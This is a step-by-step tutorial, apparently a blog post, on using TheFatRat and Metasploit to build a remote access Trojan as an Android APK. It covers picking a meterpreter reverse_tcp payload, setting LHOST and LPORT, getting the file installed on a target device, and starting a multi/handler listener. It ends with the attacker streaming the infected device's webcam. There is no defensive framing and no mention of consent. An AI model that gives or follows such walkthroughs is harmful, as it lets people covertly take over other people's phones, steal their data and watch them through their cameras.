RAT- Remote access Trojan, it is a malicious code which looks legit but takes control of the system. The infected system can be harmed anytime the hacker wants. It can access confidential information, can use webcam, microphone, take screenshots, read-write and alter data, etc.
FatRat is a tool used for making malware using MSF venom using Metasploit framework. It compiles the malware with payload and makes a RAT for different platforms depending on what payload we are using and what kind of malware we want to make.
This tool can be used as follows:
Step 1: give command ‘fatrat’.
It starts checking for all the modules needed in it are available or not.
Step 2: after checking the tool get started.
Asking about how you want to create the backdoor.
I used ‘make a backdoor using msfvenom’.
Step 3: In this step it asks about for which platform we need to make the file. (e.g. For windows we need a .exe file)
Here I choose to make an android file that is ‘.apk extension’.
Step 4: it tells about local IPv4 and IPv6 address and gives an option to set the localhost IP (LHOST IP)
Here I set the LHOST IP my local IPv4 IP address
And then it asks to set LPORT (local port), we can choose any free from 65535 ports.
Step 5: after LPORT is entered it ask for naming the output file.
We can give any name to the file.
Step 6: after entering the name it asks for selecting the payload to use.
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
Here we use the 3rd option that is for the reverse_tcp that is for the back connection.
Step 7: After entering payload all the info is filled and the tool starts making an apk file.
When it is done it ask if we want to make a listener file for MSFconsole for future use (y/n).
Listener file contain the information about the configuration of the MSFconsole. That contains payload, Lhost info, Lport info.
It will be stored in ‘/TheFatRat/config/listeners’
I typed ‘y’
Then it asks a name for the config file.
After entering the name and pressing enter we go to next step which tells about success and location of RAT file and config file.
Now our file is ready to use.
Just make it install on some system and after installation is done.
Now the turn comes of Metasploit framework.
Metasploit framework- is a software platform for developing, testing, and executing exploits.
Step 8: open the Metasploit framework by the command ‘msfconsole’
After this command metasploit framework will open
Step 9: now by ‘use’ command choose multi handler.
Command: use multi/handler.
Step 10: after multi/handler is on we set the payload using set command.
Command: set payload [payload]
After payload is set, we set Lhost and Lport (we can use the listener file for correct details).
We can use showoptions command to check what else options are there to fill in the payload selected.
Step 10: using ‘exploit’ command.
The connection is set and now we have the remote access to the device.
We can use the ‘help’ command in meterpreter to get the commands for accessing the system.
There are many commands for accessing data, hiding application, delete application etc.
I choose the command ‘webcam_stream’
After pressing enter browser will open and we can see what is visible to the webcam of the infected device.